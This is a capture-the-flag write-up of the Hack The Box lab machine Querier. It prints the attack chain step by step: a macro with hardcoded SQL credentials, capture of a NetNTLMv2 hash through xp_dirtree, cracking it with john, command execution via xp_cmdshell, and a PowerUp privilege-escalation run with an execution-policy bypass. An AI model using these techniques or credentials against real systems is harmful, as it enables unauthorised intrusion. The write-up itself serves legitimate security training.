Writeup: Hack The Box - Machines - Querier

(Updated: )
writeups
,

Description

  • Name: Querier
  • IP: 10.10.10.125
  • Author: mrh4sh & egre55
  • Difficulty: 5.2/10

Discovery

nmap -sV -sC -Pn 10.10.10.125

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
PORT     STATE SERVICE       REASON          VERSION
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds? syn-ack ttl 127
1433/tcp open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server  14.00.1000.00
| ms-sql-ntlm-info:
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: QUERIER
|   DNS_Domain_Name: HTB.LOCAL
|   DNS_Computer_Name: QUERIER.HTB.LOCAL
|   DNS_Tree_Name: HTB.LOCAL
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-06-19T20:54:35
| Not valid after:  2049-06-19T20:54:35
| MD5:   3d0e 78a8 d3f9 045f e210 83b0 63c2 678d
| SHA-1: 2f70 d6a2 fb84 c349 ac3d b5ca 96ae 8b0a 3a0e 275c
| -----BEGIN CERTIFICATE-----
| MIIC/jCCAeagAwIBAgIQOynOEG/RjYlM4VpPmIkO4DANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswHhcNMTkwNjE5MjA1NDM1WhcNNDkwNjE5MjA1NDM1WjA7MTkw
| NwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEAbABs
| AGIAYQBjAGswggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDYiSfYhQ1q
| o0GWGyw/3Z7wObjDPeTQPgFZ1l6oIr+ujBBbFQA4tbM5HYAg1qADwgXt64R2TGLn
| /Brjort64fXYGXk2lzMrgevvckeeC6u9GcT6YWLA76JOeGeZftyrHoF4t5Bodf0A
| K/rn3BGsWvh+sBBngi6SS5dBg2cb3lPPgbd3n23BwIRKBvwqmYtjFveqqUpXoHQX
| ldOcEbnJ6Rp6gq/mE+s0A6cXqsqL4j14RDKsS+7rkU6aP8yXFvFaj/MCk8yXmX8K
| NNJZ5hF4xB8exkcBwjN550bnXqnqR7fK0yt+YqoioGOwQHS2HpJ/plVuD4XRGdXQ
| XA0eg/pqXSytAgMBAAEwDQYJKoZIhvcNAQELBQADggEBAEzemJ04ugnttlGahv1Y
| b4/+rnaGsp4orcPQDxcDuLzXPBJQ2NJ0Um16uZ559neDtC+1cMgmt8Y2n29pSuX1
| bPj4Dc3n+YofSsYHYPgCxBQHaq0bJxX1UoHsk2o1i28CywQ2bgojFu+iKFmwEMgQ
| ni5jFBkUBM/JJ5MUYR8PNJ66hkXRiL4pl63oElNMRwT0vlgaIU4qGmWrE72iCLui
| h0DajwCJjND8f8ILVC3arvVWMZXitQOUT7hRH5NGjQhBfBsHXaB5QB/l90BQK3NR
| Hwdcc4kgjG6o6HK5aEw300xBuFq7YMxNWqg6ScYvURm83J80TqFjMnfhfRMTyypK
| LE8=
|_-----END CERTIFICATE-----
|_ssl-date: 2019-06-19T21:21:54+00:00; +1s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| ms-sql-info:
|   10.10.10.125:1433:
|     Version:
|       name: Microsoft SQL Server
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server
|_    TCP port: 1433
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 10624/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 43566/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 64306/udp): CLEAN (Timeout)
|   Check 4 (port 40571/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-06-19 23:21:57
|_  start_date: N/A

Pwn

The machine has SMB accessible with null sessions. Using smbclient it’s possible to get the list of shares (somehow smbclient.py from Impacket and nullinux didn’t work).

1
2
3
4
5
6
7
8
9
10
smbclient -L '\\10.10.10.125\'
Unable to initialize messaging context
Enter MYGROUP\dodo's password:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	Reports         Disk

The only shares that it is accessible without authentication is Reports.

The Excel file contains a VBA macro that is executed when the file is opened:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
olevba 0.54.2 on Python 3.7.3 - http://decalage.info/python/oletools
===============================================================================
FILE: Currency Volume Report.xlsm
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

' macro to pull data for client volume reports
'
' further testing required

Private Sub Connect()

Dim conn As ADODB.Connection
Dim rs As ADODB.Recordset

Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open

If conn.State = adStateOpen Then

  ' MsgBox "connection successful"

  'Set rs = conn.Execute("SELECT * @@version;")
  Set rs = conn.Execute("SELECT * FROM volume;")
  Sheets(1).Range("A1").CopyFromRecordset rs
  rs.Close

End If

End Sub
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|Suspicious|Open                |May open a file                              |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
+----------+--------------------+---------------------------------------------+

In this macro there is a password that can be use to connect to the MSSQL server on port 1433; Impacket, as always, provides a client wrapper.

mssqlclient.py 'reporting:PcwTWTHRwryjc$c6@10.10.10.125' --windows-auth

Once the connection is established we found out that the user reporting can’t enable xp_cmdshell (this function is used to execute commands on the server using stored procedures). Recalling from the Giddy‘s box, another stored procedure can be abused to trigger a SMB coonection from the SQL Server: xp_dirtree.

Using smbserver.py (yeah…from Impacket!) we can spin up a SMB server used to capture the NetNTLMv2 hash from the SQL Server.

1
mssql-svc::QUERIER:4141414141414141:f9767739d87bf9301e066382f8e3c505:010100000000000000e96a58e726d50150aa1602130361320000000001001000730065005400630045005000690049000200100046006500560058004e0078006700650003001000730065005400630045005000690049000400100046006500560058004e007800670065000700080000e96a58e726d501060004000200000008003000300000000000000000000000003000002e152fd9319a8459f0500de2523647bf9d3af557b859e907a69e1e3ae81372f30a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e0035003300000000000000000000000000

The hash is easily cracked using john and rockyou (or with hashcat using mode 400):

1
2
3
4
john hash.txt --wordlist=/home/dodo/Tools/rockyou.txt
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
corporate568     (mssql-svc)
Session completed

Using this pair of credentials it’s possible to execute commands from the MSSQL client:

And the first flag can be read:

xp_cmdshell type C:\Users\mssql-svc\Desktop\user.txt

To move on the privilege escaltion phase we used PowerUP.ps1 from PowerShellMafia. This script will check for loot credentials, vulnerable DDLs and unquoted path that can be exploited in Windows machines.

Using the same SMB server it’s possible to upload the script on the machine.

The script is located in the %TEMP% folder and use xp_cmdshell we can trigger the import and the execution:

xp_cmdshell powershell.exe -exec bypass -Command "& {Import-Module %TEMP%\PowerUp.ps1; Invoke-AllChecks|Out-File -Encoding ASCII %TEMP%\checks.txt}"

After a while checks.txt is written in the folder.

Luckly the Administrator password is stored and readable from the Groups.xml file:

smbclient.py 'Administrator:MyUnclesAreMarioAndLuigi!!1!@10.10.10.125'

With the Administrator user login we can read the last flag.

N.B.: in this case the user mssql-svc has the privilege SeImpersonatePrivilege enabled but the system (Windows Server 2019) is patched against Rotten Potato family exploits.